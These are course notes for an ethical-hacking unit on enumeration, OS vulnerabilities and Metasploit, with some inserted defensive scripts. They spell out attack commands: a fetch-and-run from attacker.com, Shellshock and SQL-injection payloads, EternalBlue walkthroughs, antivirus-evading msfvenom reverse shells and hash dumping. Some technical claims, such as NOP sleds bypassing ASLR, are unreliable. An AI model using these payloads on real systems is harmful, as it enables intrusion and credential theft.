Unit 3 Notes


COURSE CODE    COURSE TITLE       L   T   P   C
10212CS225     Ethical Hacking    3   0   2   4

UNIT – 3 Enumeration and System Hacking L-9 Hours

Introduction to Enumeration – DNS Zone Transfers – NetBIOS Enumeration Tools- Windows and
Linux Operating System Vulnerabilities – Metasploit framework- System Hacking – Malware
Creation – Evading IDS, Firewall and Honeypot - Maintaining Access and Clearing Tracks

1. Introduction to Enumeration
Enumeration is the process of extracting valuable information from a target system or
network. Different enumeration techniques are used depending on the type of system and the
required information. Let’s explore the main types of enumeration with real-world examples.

Types of Enumeration with Examples

i. NetBIOS Enumeration
What is NetBIOS Enumeration?
NetBIOS (Network Basic Input/Output System) allows computers to communicate and share files
over a local network. NetBIOS enumeration is used to gather information about shared resources,
machine names, and services on a Windows network.

Real-Time Example: Company File Server Access

Scenario:
A company has a file-sharing system on its internal Windows network. An ethical hacker or
administrator wants to check what network shares and devices are available.

How to Perform NetBIOS Enumeration?


Using the nbtstat command in Windows:

nbtstat -A 192.168.1.10

Expected Output:

NetBIOS Name Table


---------------------------------
Name Type Status
---------------------------------
SERVER01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
SHARED_DOCS <20> UNIQUE Registered

Result: The attacker or administrator discovers that "SHARED_DOCS" is an available file share,
which could be accessed for further testing or security auditing.

ii. SNMP Enumeration
What is SNMP Enumeration?
Simple Network Management Protocol (SNMP) is used for monitoring and managing network
devices (e.g., routers, switches, printers). If misconfigured, attackers can extract system details,
running processes, or even modify configurations.

Real-Time Example: Router Configuration Leak

Scenario:
A network administrator wants to check device information on a corporate router. However, an
attacker could also exploit weak SNMP settings to retrieve sensitive details.

How to Perform SNMP Enumeration?


Using the snmpwalk tool:

snmpwalk -v2c -c public 192.168.1.1

Expected Output:

sysDescr.0 = STRING: Cisco Router Model X


sysUpTime.0 = Timeticks: 23456789
sysContact.0 = STRING: [email protected]
sysLocation.0 = STRING: Server Room

Result: The attacker now knows the router model, admin contact, and location, which could be
used in social engineering or further attacks.

Prevention: Change default SNMP community strings and restrict SNMP access.

iii. LDAP Enumeration


What is LDAP Enumeration?
LDAP (Lightweight Directory Access Protocol) is used for accessing user directories in
enterprise networks (e.g., Active Directory). Attackers can query LDAP to gather user details,
email addresses, and group memberships.

Real-Time Example: Employee Directory Exposure

Scenario:
An attacker targets a company using Microsoft Active Directory to extract a list of employees.

How to Perform LDAP Enumeration?


Using ldapsearch in Linux:

ldapsearch -x -h ldap.company.com -b "dc=company,dc=com"

Expected Output:

dn: cn=John Doe,ou=Employees,dc=company,dc=com


mail: [email protected]
title: Senior Engineer

Result: The attacker now has employee names, emails, and job roles, which can be used for
phishing or brute-force attacks.

Prevention: Restrict anonymous LDAP queries and enforce strong authentication.

iv. NTP Enumeration


What is NTP Enumeration?
Network Time Protocol (NTP) is used to synchronize system clocks across a network. Attackers
can query NTP servers to gather a list of connected clients, system uptime, or exploit
vulnerabilities.

Real-Time Example: DDoS Attack via NTP Amplification

Scenario:
An attacker looks for misconfigured NTP servers that respond to the "monlist" command, which
provides a list of recent clients. This data can be used to launch NTP amplification attacks.

How to Perform NTP Enumeration?


Using ntpq command:

ntpq -c monlist 192.168.1.1

Expected Output:

remote address local address count


-------------------------------------------------
192.168.1.10 192.168.1.1 300
192.168.1.20 192.168.1.1 200

Result: The attacker now knows which devices are syncing with the NTP server and can exploit
them for further attacks.

Prevention: Disable the "monlist" command in NTP configuration.


1.3. NetBIOS Enumeration Tools
i. Netstat (Network Statistics)

What is Netstat?
Netstat is a command-line tool used to view network connections, active ports, and NetBIOS
statistics. It helps in diagnosing network issues, monitoring TCP/IP activity, and resolving
NetBIOS name conflicts.

Real-Time Example: Using netstat for NetBIOS Enumeration

Let’s assume you suspect an unknown system is accessing shared files on your network. You want
to check NetBIOS connections to see active file-sharing sessions.

Step 1: Open Command Prompt

Press Win + R, type cmd, and hit Enter.

Step 2: Run netstat to View Active Connections


netstat -an

Expected Output:

Proto Local Address Foreign Address State


TCP 192.168.1.5:139 192.168.1.10:5678 ESTABLISHED
TCP 192.168.1.5:445 192.168.1.12:4356 ESTABLISHED

Explanation:

• Port 139 (NetBIOS Session Service) → Indicates a shared file access session.
• Port 445 (SMB - Server Message Block) → Windows file sharing over the network.
• The foreign IPs (192.168.1.10, 192.168.1.12) represent systems accessing shared files.

Step 3: Check NetBIOS Name Table


netstat -n

Output Example:

Active Connections
Proto Local Address Foreign Address State
TCP 192.168.1.5:139 192.168.1.20:1234 ESTABLISHED

If you see a suspicious connection, you can use:

nbtstat -A 192.168.1.20

This will reveal the NetBIOS name and shared resources of the remote device.

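As an added example that is not part of these notes, the following Python script parses netstat -an output like the sample above and flags established NetBIOS/SMB sessions (local ports 139 and 445) from hosts outside an allowed subnet, which are the connections worth following up with nbtstat -A. The netstat text and the 192.168.1.0/24 allowlist are constructed for the example.

```python
import ipaddress
import re

# Constructed sample of "netstat -an" output on a Windows file server
# (modelled on the lines shown in the notes; the 10.0.0.77 entry is the outlier)
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.1.5:139        192.168.1.10:5678      ESTABLISHED
  TCP    192.168.1.5:445        192.168.1.12:4356      ESTABLISHED
  TCP    192.168.1.5:445        10.0.0.77:50211        ESTABLISHED
  TCP    192.168.1.5:3389       192.168.1.30:61002     ESTABLISHED
  UDP    192.168.1.5:137        *:*
"""

# Local ports that carry Windows file sharing: 139 (NetBIOS session) and 445 (SMB)
FILE_SHARING_PORTS = {139, 445}

# Assumed allowlist: only the internal LAN may open file-sharing sessions to this host
ALLOWED_CLIENTS = [ipaddress.ip_network("192.168.1.0/24")]

# Protocol, local endpoint, foreign endpoint and an optional state (UDP rows have none)
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")


def split_endpoint(endpoint):
    """Split 'host:port' into (host, port); port is None for '*:*' style entries."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port) if port.isdigit() else None


def parse_netstat(text):
    """Turn netstat -an lines into dicts; headers and blank lines are skipped."""
    connections = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        proto, local, foreign, state = match.groups()
        _, local_port = split_endpoint(local)
        foreign_host, foreign_port = split_endpoint(foreign)
        connections.append({
            "proto": proto,
            "local_port": local_port,
            "foreign_host": foreign_host,
            "foreign_port": foreign_port,
            "state": state or "",
        })
    return connections


def suspicious_share_sessions(connections, allowed=ALLOWED_CLIENTS):
    """Return (foreign_host, local_port) for established 139/445 sessions from
    hosts outside the allowed networks; each is a candidate for nbtstat -A."""
    flagged = []
    for conn in connections:
        if conn["proto"] != "TCP" or conn["state"] != "ESTABLISHED":
            continue
        if conn["local_port"] not in FILE_SHARING_PORTS:
            continue
        try:
            addr = ipaddress.ip_address(conn["foreign_host"])
        except ValueError:
            continue  # not a literal IPv4/IPv6 address (e.g. '*' or '[::1]'); skip
        if not any(addr in net for net in allowed):
            flagged.append((conn["foreign_host"], conn["local_port"]))
    return flagged


if __name__ == "__main__":
    for host, port in suspicious_share_sessions(parse_netstat(SAMPLE_NETSTAT)):
        print(f"unexpected file-sharing session from {host} on local port {port}")
```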
ii. Hyena (GUI-Based Windows Management & Enumeration)

What is Hyena?
Hyena is a Windows system management tool that provides a graphical interface for managing
Active Directory, shared resources, users, groups, and network sessions.

Real-Time Example: Using Hyena for NetBIOS Enumeration

Imagine you’re an IT administrator and want to check who is accessing shared files on your
Windows server.

Step 1: Download & Install Hyena

• Download Hyena from SystemTools.com
• Install and launch the application.

Step 2: Open Hyena & Connect to Active Directory

• Open Hyena and expand "Windows Network".
• Select the target domain (company.local).
• Click on "Computers" to see all devices in the network.

Step 3: View Active File Shares

• Expand "Shares" to list all shared folders.
• Click on a shared folder to view who is accessing it.

Expected Output in Hyena UI:

Shared Folder: \\SERVER01\SHARE


User: JohnDoe
Status: Active Session

Now you know that "JohnDoe" is accessing "SHARE" on SERVER01.

Step 4: Check Group Memberships

• Click Users → Select a user → View Group Member Matrix.

Example Output:

User: JohnDoe
Group: IT Admins
Nested Group: Domain Users

This helps identify unauthorized group memberships.

Hyena also lets you:

✔ View open files and forcefully close unwanted sessions.
✔ Modify group policies and user permissions.

iii. PsExec (Remote Command Execution Tool)

What is PsExec?
PsExec is a command-line tool that allows you to run commands on remote Windows
computers without physically accessing them.

Real-Time Example: Using PsExec for Remote Enumeration

Assume you are an administrator and need to check the IP configuration of a remote system
(192.168.1.20).

Step 1: Download PsExec

1. Download PsExec from Microsoft Sysinternals:
   https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
2. Extract PsExec.exe to C:\Windows\System32.

Step 2: Open Command Prompt as Administrator

Press Win + R, type cmd, and hit Ctrl + Shift + Enter.

Step 3: Run PsExec to Execute Remote Commands


psexec \\192.168.1.20 -u Administrator -p password cmd

Output:

Microsoft Windows [Version 10.0.19044.1288]


C:\Windows\system32>

Now you have a remote command shell on the target system!

Step 4: Run IP Configuration on the Remote Machine


ipconfig /all

Output Example:

Ethernet adapter Ethernet:


Connection-specific DNS Suffix . : example.com
IPv4 Address. . . . . . . . . . . : 192.168.1.20
Default Gateway . . . . . . . . . : 192.168.1.1

You successfully retrieved network information from a remote PC!

Other Useful PsExec Commands:

• Check Running Processes on Remote PC:

psexec \\192.168.1.20 tasklist

• Shut Down Remote Computer:

psexec \\192.168.1.20 shutdown /s /t 0

1.4. Windows and Linux Operating System Vulnerabilities


Operating systems (OS) are a key target for cybercriminals due to their widespread use.
Both Windows and Linux have vulnerabilities that attackers exploit to gain unauthorized access,
execute malicious code, or disrupt system functionality.

I. Windows OS Vulnerabilities
Windows, being one of the most commonly used operating systems, is frequently targeted by
attackers. Some of the key vulnerabilities include:

i. Buffer Overflows

What is it?
A buffer overflow occurs when a program writes more data to a memory buffer than it can
hold, causing data corruption or code execution. This allows attackers to inject malicious code
and take control of the system.

Real-Time Example: Microsoft’s Windows SMB Vulnerability (MS08-067)


Scenario:

• Microsoft’s Server Message Block (SMB) service had a buffer overflow vulnerability in Windows
XP and Windows Server 2003.
• Attackers exploited this bug to remotely execute malware on unpatched systems.
• The Conficker worm used this vulnerability to spread across millions of computers.

How to Exploit It? (Penetration Testing Example)

1. Open Metasploit and run:

use exploit/windows/smb/ms08_067_netapi

2. Set the target IP and exploit:

set RHOSTS 192.168.1.10
exploit

Effect: If the system is vulnerable, the attacker gains a remote shell, allowing them to execute
commands.

Prevention:
Keep Windows updated with security patches.
Disable SMBv1 (older versions of SMB are vulnerable).

ii. Remote Code Execution (RCE)

What is it?
RCE vulnerabilities allow attackers to execute commands remotely on a Windows system. This
is often exploited in unpatched software, web applications, or network services.

Real-Time Example: EternalBlue & WannaCry Ransomware (MS17-010)


Scenario:

• In 2017, the EternalBlue exploit (NSA-developed) was leaked by hackers.
• Attackers used it to spread WannaCry ransomware across unpatched Windows machines.
• The attack encrypted files and demanded a Bitcoin ransom.

How to Exploit It?

1. Run Nmap to detect vulnerable systems:

nmap -p 445 --script smb-vuln-ms17-010 192.168.1.0/24

2. Exploit using Metasploit:

use exploit/windows/smb/ms17_010_eternalblue

Effect: Attackers gain full control of the system and can install malware.

Prevention:
Always update Windows and apply patches.
Disable unnecessary services like SMB.
Use a firewall to block untrusted connections.

iii. Privilege Escalation

What is it?
Privilege escalation occurs when an attacker gains higher-level permissions (Administrator or
SYSTEM access) by exploiting OS vulnerabilities.

Real-Time Example: PrintNightmare Vulnerability (CVE-2021-34527)


Scenario:

• The Windows Print Spooler service had a flaw that allowed attackers to gain SYSTEM privileges.
• Attackers could install programs, modify data, and create new accounts with full rights.
• This was widely exploited in corporate networks.

How to Exploit It?

1. Open PowerShell and execute:

Invoke-WebRequest -Uri http://attacker.com/exploit.ps1 -OutFile exploit.ps1

2. Run the exploit:

powershell -ExecutionPolicy Bypass -File exploit.ps1

Effect: The attacker gets full control over the system.

Prevention:
Disable Print Spooler if not needed:

Stop-Service -Name Spooler -Force

Restrict user privileges and use endpoint security tools.

iv. Zero-Day Exploits

What is it?
Zero-day vulnerabilities are security flaws discovered by hackers before the vendor releases a
patch. These are highly dangerous because there is no immediate fix.

Real-Time Example: Windows Win32k Zero-Day Exploit (CVE-2023-28252)


Scenario:

• A privilege escalation flaw in the Win32k driver allowed attackers to execute arbitrary code.
• Used by ransomware groups to take control of Windows machines.
• Microsoft released a patch, but many unpatched systems remained vulnerable.

Prevention:
Enable automatic updates.
Use an intrusion detection system (IDS).
Implement application whitelisting to prevent unknown executables.

II. Linux OS Vulnerabilities
Linux is widely used in servers, cloud computing, and enterprise environments due to its
stability and security. However, Linux is not invulnerable—hackers can exploit vulnerabilities
to gain unauthorized access, execute malicious code, or disrupt services.

Below are the key Linux OS vulnerabilities, each explained separately with real-time examples.

i. Kernel Vulnerabilities
What is it?

The Linux kernel is the core of the operating system. A kernel vulnerability can allow attackers
to gain root access or execute arbitrary code at the highest privilege level.

Real-Time Example: Dirty COW (CVE-2016-5195)

Scenario:

• A vulnerability in the Linux kernel’s copy-on-write (COW) mechanism allowed any user to gain
root access.
• Attackers could modify read-only files and overwrite system binaries.
• This was exploited in the wild, affecting servers and cloud systems.

Exploitation Demonstration

1. Check Kernel Version:

uname -r

If the version is before 4.8, the system is vulnerable.

2. Run the Dirty COW exploit (for educational purposes only):

gcc dirtycow.c -o exploit
./exploit

The attacker gains root privileges and can execute any command.

Prevention:

Update the Linux kernel regularly:

sudo apt update && sudo apt upgrade -y

Use SELinux or AppArmor to restrict privilege escalation.


ii. Privilege Escalation
What is it?

Privilege escalation occurs when a low-privileged user exploits vulnerabilities to gain root
access.

Real-Time Example: Sudo Vulnerability (CVE-2021-3156)

Scenario:

• A bug in the sudo command allowed any user to become root.
• Attackers exploited this to modify system files and create new root accounts.

Exploitation Demonstration

1. Check if sudo is vulnerable:

sudoedit -s /

If an error like "malloc(): corrupted top size" appears, the system is vulnerable.

2. Exploit the vulnerability (for testing only):

./sudo_exploit

The attacker gains root privileges without a password.

Prevention:

Update sudo to the latest version:

sudo apt update && sudo apt upgrade sudo -y

Disable unnecessary sudo permissions for users.

iii. Remote Code Execution (RCE)


What is it?

An RCE vulnerability allows attackers to run malicious code remotely on a Linux system. This
can happen due to weak SSH, vulnerable services, or exposed APIs.

Real-Time Example: Shellshock Bug (CVE-2014-6271)

Scenario:

• A vulnerability in Bash allowed attackers to execute arbitrary commands remotely.
• Affected web servers, routers, and IoT devices running Bash.

Exploitation Demonstration

1. Check if Bash is vulnerable:

env x='() { :;}; echo Vulnerable' bash -c "echo Testing"

If the output includes "Vulnerable", the system is exploitable.

2. Attack using an HTTP request:

curl -H "User-Agent: () { :;}; /bin/bash -c 'id'" http://target.com/cgi-bin/vulnerable.cgi

The attacker gains remote access to the server.

Prevention:

Update Bash to a patched version.

sudo apt update && sudo apt upgrade bash -y

Disable unnecessary CGI scripts in web servers.
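Defensive counterpart to the check above, added here and not part of the notes: a Python script that scans web server access log lines for the "() {" marker that a Shellshock probe places in request headers such as User-Agent or Referer (CGI copies those headers into Bash's environment, which is exactly what the bug parsed). The log lines are constructed for the example.

```python
import re

# Constructed Apache/Nginx "combined" access log lines. The third line carries a
# Shellshock probe in the User-Agent, the fourth in the Referer; the rest are benign.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Mar/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2025:10:01:09 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 88 "-" "curl/7.88.1"
198.51.100.9 - - [10/Mar/2025:10:02:15 +0000] "GET /cgi-bin/vulnerable.cgi HTTP/1.1" 200 40 "-" "() { :;}; /bin/bash -c 'id'"
198.51.100.9 - - [10/Mar/2025:10:02:16 +0000] "GET /cgi-bin/vulnerable.cgi HTTP/1.1" 200 40 "() { :; }; /bin/bash -c 'uname -a'" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [time], "request", status, bytes, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Vulnerable Bash imported any environment variable whose value began with "() {"
# as a function definition and kept parsing (and executing) what followed the body.
# CGI copies request headers into environment variables (HTTP_USER_AGENT,
# HTTP_REFERER, ...), so the marker appearing in a header is the thing to look for.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Request fields that end up in the CGI environment
HEADER_FIELDS = ("request", "referer", "ua")


def parse_access_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match:
            records.append(match.groupdict())
    return records


def request_path(record):
    """Extract the path from a request line such as 'GET /path HTTP/1.1'."""
    parts = record["request"].split()
    return parts[1] if len(parts) >= 2 else record["request"]


def find_shellshock_probes(records):
    """Return (client_ip, path, field) for every record carrying the marker."""
    hits = []
    for record in records:
        for field in HEADER_FIELDS:
            if SHELLSHOCK_RE.search(record[field]):
                hits.append((record["ip"], request_path(record), field))
    return hits


if __name__ == "__main__":
    for ip, path, field in find_shellshock_probes(parse_access_log(SAMPLE_ACCESS_LOG)):
        print(f"Shellshock probe from {ip} against {path} via {field}")
```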

iv. Web Application Vulnerabilities


What is it?

Many Linux servers host web applications (Apache, Nginx, PHP). Web applications can be
vulnerable to:

• SQL Injection (SQLi) – Attackers inject malicious SQL queries.
• Cross-Site Scripting (XSS) – Attackers inject JavaScript into web pages.

Real-Time Example: SQL Injection on Linux Server

Scenario:

• A vulnerable web page uses MySQL without input validation.
• Attackers can extract sensitive data from the database.

Exploitation Demonstration

1. Find a vulnerable login form:

Username: ' OR 1=1 --
Password: (anything)

This bypasses authentication and logs in as admin.


2. Extract all user credentials:

' UNION SELECT username, password FROM users --

The attacker steals all database records.

Prevention:

Use prepared statements to prevent SQL injection.


Install a Web Application Firewall (WAF) like ModSecurity.
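To make the prevention concrete, the following added example (not from the notes) shows the vulnerable login query built by string concatenation next to the prepared-statement version, using Python's built-in sqlite3 module as a stand-in for MySQL; the users table and its rows are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the MySQL database.
    Passwords are kept in clear text only to keep the example short; a real
    system stores salted hashes, which does not change the injection shown here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!"), ("john", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """The flaw: user input is pasted into the SQL text, so it can rewrite the query.
    With username "' OR 1=1 --" the WHERE clause becomes  username = '' OR 1=1
    and everything after -- (including the password check) is a comment."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """The fix: a prepared statement sends the SQL and the values separately, so
    quotes and comment markers in the input are just characters in a string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR 1=1 --"
    print("concatenated query:", login_vulnerable(db, bypass, "anything"))  # admin
    print("prepared statement:", login_safe(db, bypass, "anything"))        # None
    print("real credentials:  ", login_safe(db, "admin", "S3cret!"))        # admin
```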

v. Package Vulnerabilities
What is it?

Linux systems rely on third-party software (Apache, OpenSSH, Python). If these packages
contain security flaws, attackers can exploit them.

Real-Time Example: OpenSSL Heartbleed (CVE-2014-0160)

Scenario:

• A flaw in OpenSSL’s Heartbeat extension leaked sensitive memory data (including passwords &
encryption keys).
• Attackers stole SSL certificates from major websites.

Exploitation Demonstration

1. Check OpenSSL version:

openssl version -a

If the version is before 1.0.1g, it is vulnerable.

2. Exploit the vulnerability:

python heartbleed_exploit.py target.com

Attackers extract sensitive server data.

Prevention:

Update OpenSSL immediately:

sudo apt update && sudo apt upgrade openssl -y

Use TLS 1.2+ instead of outdated SSL versions.


vi. Misconfigurations
What is it?

Weak security settings make Linux systems vulnerable. Common misconfigurations include:

• Weak passwords (admin:admin).
• Exposed services (FTP, Telnet, RDP).
• Incorrect file permissions (chmod 777).

Real-Time Example: Weak SSH Configuration

Scenario:

• A company exposes SSH to the internet without strong authentication.
• Attackers perform brute-force login and access the system.

Exploitation Demonstration

1. Scan for open SSH ports:

nmap -p 22 --script ssh-brute 192.168.1.10

If SSH is misconfigured, attackers gain access using default credentials.

Prevention:

Disable root login in SSH:

sudo nano /etc/ssh/sshd_config


PermitRootLogin no

Enforce key-based authentication instead of passwords.
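An added example, not from the notes, that turns the prevention advice into a check: a Python audit of sshd_config that reports PermitRootLogin, password authentication, MaxAuthTries and a missing AllowUsers/AllowGroups restriction, applying the defaults sshd uses when a keyword is absent. Both configurations and the MaxAuthTries threshold of 4 are constructed for the example.

```python
import re

# Constructed sshd_config showing the weak settings from the scenario above
WEAK_SSHD_CONFIG = """\
# Constructed example: internet-facing server with defaults left in place
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 10
X11Forwarding yes
"""

# Constructed hardened counterpart: key-only logins, no root, limited users
HARDENED_SSHD_CONFIG = """\
Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 3
AllowUsers deploy ops
"""

# sshd's own defaults for the keywords checked (OpenSSH 7.0 and later);
# a keyword absent from the file takes its default, so it must still be judged
SSHD_DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
    "maxauthtries": "6",
}

# Required values and the reason, matching the prevention advice in the notes
REQUIRED = {
    "permitrootlogin": ("no", "root must not log in over SSH"),
    "passwordauthentication": ("no", "use key-based authentication instead of passwords"),
    "pubkeyauthentication": ("yes", "key-based authentication must stay enabled"),
    "permitemptypasswords": ("no", "accounts with empty passwords must not log in"),
}
MAX_AUTH_TRIES = 4  # assumed threshold; sshd's default of 6 leaves more room for guessing


def parse_sshd_config(text):
    """Return {keyword (lowercased): value} for the global section of sshd_config.
    sshd keeps the first value it sees for a keyword and accepts 'Key value' or
    'Key=value'; everything after a Match line is conditional, so parsing stops
    there (assumption: Match blocks are reviewed separately)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        settings.setdefault(key, value)  # first occurrence wins, as in sshd
    return settings


def audit_sshd_config(text):
    """Return {keyword: finding} for every setting that fails the policy; {} means pass."""
    settings = parse_sshd_config(text)
    findings = {}
    for key, (wanted, why) in REQUIRED.items():
        actual = settings.get(key, SSHD_DEFAULTS[key])
        if actual.lower() != wanted:
            findings[key] = f"is '{actual}', want '{wanted}': {why}"
    tries = int(settings.get("maxauthtries", SSHD_DEFAULTS["maxauthtries"]))
    if tries > MAX_AUTH_TRIES:
        findings["maxauthtries"] = f"is {tries}, want at most {MAX_AUTH_TRIES} to slow brute force"
    if "allowusers" not in settings and "allowgroups" not in settings:
        findings["allowusers"] = "no AllowUsers/AllowGroups: every local account may try to log in"
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        findings = audit_sshd_config(cfg)
        print(f"{name}: {'PASS' if not findings else 'FAIL'}")
        for key, msg in findings.items():
            print(f"  {key} {msg}")
```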

vii. Zero-Day Exploits


What is it?

A zero-day exploit is an unknown vulnerability that has no fix. Attackers use these flaws to
target Linux systems before patches are released.

Real-Time Example: Linux Polkit Vulnerability (CVE-2021-4034)

Scenario:

• A vulnerability in Polkit (pkexec) allowed root access on Linux systems.
• Attackers exploited this before a patch was released.

Prevention:

Apply security updates as soon as patches are available.
Use intrusion detection systems (IDS).

1.5 Metasploit Framework

Introduction
Metasploit is a penetration testing framework used for developing and executing exploit
code against remote target machines. It is widely used in cybersecurity for vulnerability
assessment, ethical hacking, and security testing. The framework provides a vast library of
exploits, payloads, auxiliary tools, and post-exploitation modules, making it an essential tool for
both offensive and defensive security professionals.

Modules of Metasploit Framework


Metasploit is structured into different modules, each serving a specific purpose in penetration
testing:

1. Exploits

• An exploit is a piece of code designed to take advantage of security vulnerabilities in a target
system.
• Metasploit contains a large database of exploits that can be used against operating systems,
applications, and services.
• Example: MS17-010 EternalBlue exploit, which targets a Windows SMB vulnerability.

2. Payloads

• A payload is the code that gets executed on the target system after a successful exploit.
• Types of payloads:
  o Reverse Shell – The compromised machine connects back to the attacker’s machine.
  o Bind Shell – The attacker connects to a shell on the compromised machine.
  o Meterpreter – An advanced, interactive payload that provides deep system access.
• Example: windows/meterpreter/reverse_tcp

3. Auxiliary Modules

• Non-exploit modules used for scanning, enumeration, fuzzing, and brute-force attacks.
• Used to gather information about a target before launching an attack.
• Example: scanner/ftp/ftp_login for brute-forcing FTP credentials.

4. Encoders

• Encoders help in bypassing antivirus and security mechanisms by obfuscating payloads.
• Example: shikata_ga_nai – A popular encoder for hiding malicious payloads.

5. Post-Exploitation Modules

• Used after a successful exploitation to perform advanced attacks such as privilege escalation,
data extraction, and maintaining persistence.
• Example: windows/gather/enum_logged_on_users – Retrieves a list of logged-in users.

6. NOP Generators (No Operation)

• Used to prevent Intrusion Detection Systems (IDS) from detecting malicious payloads.
• Helps in buffer overflow attacks by adding non-operational instructions.

Components of Metasploit Framework


Metasploit consists of various tools and interfaces that help users interact with the framework
efficiently.

1. Msfconsole

• The most powerful and flexible command-line interface of Metasploit.
• Allows users to search, configure, and execute exploits and payloads.
• Commands:

msfconsole
search smb
use exploit/windows/smb/ms17_010_eternalblue

2. Msfvenom

• A tool used to generate and encode payloads.
• Combines msfpayload and msfencode into one tool.
• Example: Generate a reverse shell payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=4444 -f exe > payload.exe

3. Armitage

• A Graphical User Interface (GUI) for Metasploit.
• Helps in visualizing attacks, automating exploits, and collaborating with teams.

Metasploit Architecture
Metasploit is built on a modular architecture, making it easy to develop and use exploits. The
key components include:

1. Exploit Modules – The actual attack code that targets a system vulnerability. Exploits are used to
gain access to a system by targeting security vulnerabilities. Once the exploit is executed
successfully, attackers try to escalate privileges to gain superuser (root) access.

Types of Exploits

Exploit Type     Description
Remote Exploit   Works over a network and exploits vulnerabilities without prior access to the system.
Local Exploit    Requires prior access to the system and is used to escalate privileges (e.g., from user to root).

Example of a Remote Exploit (Windows SMB Exploit)

1. Open Metasploit:

msfconsole

2. Select an exploit (MS08-067):

use exploit/windows/smb/ms08_067_netapi

3. Set the target system:

set RHOSTS 192.168.1.10
set PAYLOAD windows/meterpreter/reverse_tcp

4. Launch the attack:

exploit

If successful, the attacker gains a remote shell on the target machine.


2. Payload Modules – Malicious code that runs after a successful exploit. The payload is the
malicious code that executes after a successful exploit. Payloads can perform actions like deleting
files, sending spam, encrypting data, or providing a remote connection.

Types of Payloads

Payload Type   Description
Singles        Self-contained payloads that perform a single task (e.g., adding a user, running an executable).
Stagers        Small programs that download and execute the main payload in memory.
Stages         The final payload that executes malicious activities after being delivered by a stager.

Example of Creating a Payload Using msfvenom


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > payload.exe

This creates an executable payload that, when run on the target system, opens a Meterpreter
session for remote control.

3 Auxiliary Modules
Auxiliary modules do not exploit vulnerabilities but are used for scanning, enumeration, and
other security-related tasks.

Features of Auxiliary Modules

• Scanning for vulnerabilities
• Sniffing network traffic
• Brute-force attacks
• Gathering target system information

Example: Scanning for Open SMB Shares


use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

This scans the network for SMB services and lists their versions.

4 Encoders in Metasploit
Encoders modify payloads to help them bypass antivirus and intrusion detection systems
(IDS).

Features of Encoders

• Obfuscate the exploit payload
• Avoid detection by security software
• Increase the chance of a successful attack

Example: Encoding a Payload to Evade Antivirus


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -e x86/shikata_ga_nai -f exe > encoded_payload.exe

The "shikata_ga_nai" encoder modifies the payload to make it harder for antivirus software to
detect.

5 Post-Exploitation Modules
Post-exploitation modules help maintain access, gather system information, and perform
additional attacks after a system is compromised.

Features of Post-Exploitation Modules

• Dumping passwords
• Capturing keystrokes
• Extracting user credentials
• Escalating privileges

Example: Dumping Windows Password Hashes


use post/windows/gather/hashdump
run

This extracts password hashes from a compromised Windows system.

6 NOPs (No Operation Instructions) in Metasploit


NOPs are machine code instructions that do nothing but help exploit execution by aligning
shellcode at a predictable memory address.

Features of NOPs

• Prevent memory corruption issues
• Ensure stable shellcode execution
• Bypass Address Space Layout Randomization (ASLR)

Example: Generating a NOP Sled with msfvenom


msfvenom -p windows/meterpreter/reverse_tcp -f raw | msfvenom -a x86 --platform windows -e x86/nops -b '\x00'

This generates a NOP sled to increase the reliability of an exploit.


Example: Exploiting Windows 7 using Metasploit (EternalBlue)

Step 1: Start Metasploit

msfconsole

Step 2: Select the Exploit


use exploit/windows/smb/ms17_010_eternalblue

Step 3: Set Target IP and Payload


set RHOSTS <Target-IP>
set payload windows/meterpreter/reverse_tcp
set LHOST <Attacker-IP>
set LPORT 4444

Step 4: Launch the Attack


exploit

Step 5: Perform Post-Exploitation


sysinfo # Get system information
getuid # Get current user privileges
